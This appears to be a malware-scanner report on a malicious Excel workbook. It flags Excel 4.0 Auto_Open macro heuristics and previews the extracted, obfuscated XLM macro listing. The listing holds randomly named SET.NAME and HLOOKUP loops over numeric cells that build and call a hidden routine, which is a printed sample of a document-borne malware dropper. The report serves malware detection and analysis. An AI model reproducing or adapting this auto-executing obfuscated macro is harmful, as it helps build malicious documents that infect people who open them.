MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6625 bytes |
SHA-256: 4176fc44472529c166d96edf1c07c7665276288db47bc29f598ab0112736206b |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - eLVOV
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G168
' 0018 25 LABEL : Cell Value, String Constant - avlHhUtIOo len=0
' 0018 20 LABEL : Cell Value, String Constant - bwkmQ len=0
' 0018 26 LABEL : Cell Value, String Constant - eEfRylPsYyJ len=0
' 0018 23 LABEL : Cell Value, String Constant - euvboKsj len=0
' 0018 22 LABEL : Cell Value, String Constant - gFAWoOY len=0
' 0018 21 LABEL : Cell Value, String Constant - hDJVyL len=0
' 0018 26 LABEL : Cell Value, String Constant - IlpvCmiAjJA len=0
' 0018 26 LABEL : Cell Value, String Constant - IVqBPtmaZtg len=0
' 0018 25 LABEL : Cell Value, String Constant - litljincUc len=0
' 0018 21 LABEL : Cell Value, String Constant - MBMGEg len=0
' 0018 26 LABEL : Cell Value, String Constant - mPxXHtGOthp len=0
' 0018 21 LABEL : Cell Value, String Constant - OkUroJ len=0
' 0018 22 LABEL : Cell Value, String Constant - QUbdVmK len=0
' 0018 23 LABEL : Cell Value, String Constant - qyNWLbtT len=0
' 0018 25 LABEL : Cell Value, String Constant - skkCbRzcHv len=0
' 0018 22 LABEL : Cell Value, String Constant - tcaMxZa len=0
' 0018 24 LABEL : Cell Value, String Constant - uwgAXmGsq len=0
' 0018 22 LABEL : Cell Value, String Constant - UwyDlmh len=0
' 0018 26 LABEL : Cell Value, String Constant - WtXIoXqQHVd len=0
' 0018 23 LABEL : Cell Value, String Constant - XWtxxNXN len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' eLVOV,P44,"",-233.00000000000000000000
' eLVOV,P45,"",-59.00000000000000000000
' eLVOV,P46,"",-654.00000000000000000000
' eLVOV,P47,"",-689.00000000000000000000
' eLVOV,P48,"",-421.00000000000000000000
' eLVOV,P49,"",768.00000000000000000000
' eLVOV,G80,"SET.NAME("skkCbRzcHv",0+VALUE("0"))",""
' eLVOV,G82,"SET.NAME("OkUroJ",skkCbRzcHv)",""
' eLVOV,G85,"SET.NAME("qyNWLbtT",skkCbRzcHv)",""
' eLVOV,G90,"SET.NAME("eEfRylPsYyJ",COUNTA(XWtxxNXN))",""
' eLVOV,G94,"SET.NAME("avlHhUtIOo",COUNTA(euvboKsj))",""
' eLVOV,G99,[],""
' eLVOV,G102,"SET.NAME("IlpvCmiAjJA","")",""
' eLVOV,G105,"OkUroJ",""
' eLVOV,G108,"SET.NAME("hDJVyL",HLOOKUP("*",XWtxxNXN,OkUroJ,FALSE))",""
' eLVOV,G110,"uwgAXmGsq",""
' eLVOV,G115,"SET.NAME("MBMGEg",skkCbRzcHv)",""
' eLVOV,G119,[],""
' eLVOV,G122,"MBMGEg",""
' eLVOV,G125,"QUbdVmK",""
' eLVOV,G127,"bwkmQ",""
' eLVOV,G131,"gFAWoOY",""
' eLVOV,G135,"SET.NAME("litljincUc",VALUE(HLOOKUP("*",euvboKsj,gFAWoOY,FALSE)))",""
' eLVOV,G139,"mPxXHtGOthp",""
' eLVOV,G141,"IlpvCmiAjJA",""
' eLVOV,G143,"qyNWLbtT",""
' eLVOV,G147,NEXT(),""
' eLVOV,G152,"IVqBPtmaZtg",""
' eLVOV,G155,[],""
' eLVOV,G157,"UwyDlmh",""
' eLVOV,G161,NEXT(),""
' eLVOV,G166,RETURN(),""
' eLVOV,G191,"SET.NAME("tcaMxZa",G80)",""
' eLVOV,G193,"XWtxxNXN",""
' eLVOV,G196,"SET.NAME("euvboKsj",R81C13)",""
' eLVOV,G198,"SET.NAME("UwyDlmh",206)",""
' eLVOV,G201,"SET.NAME("WtXIoXqQHVd",7)",""
' eLVOV,G205,tcaMxZa(),""
' eLVOV,G206,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.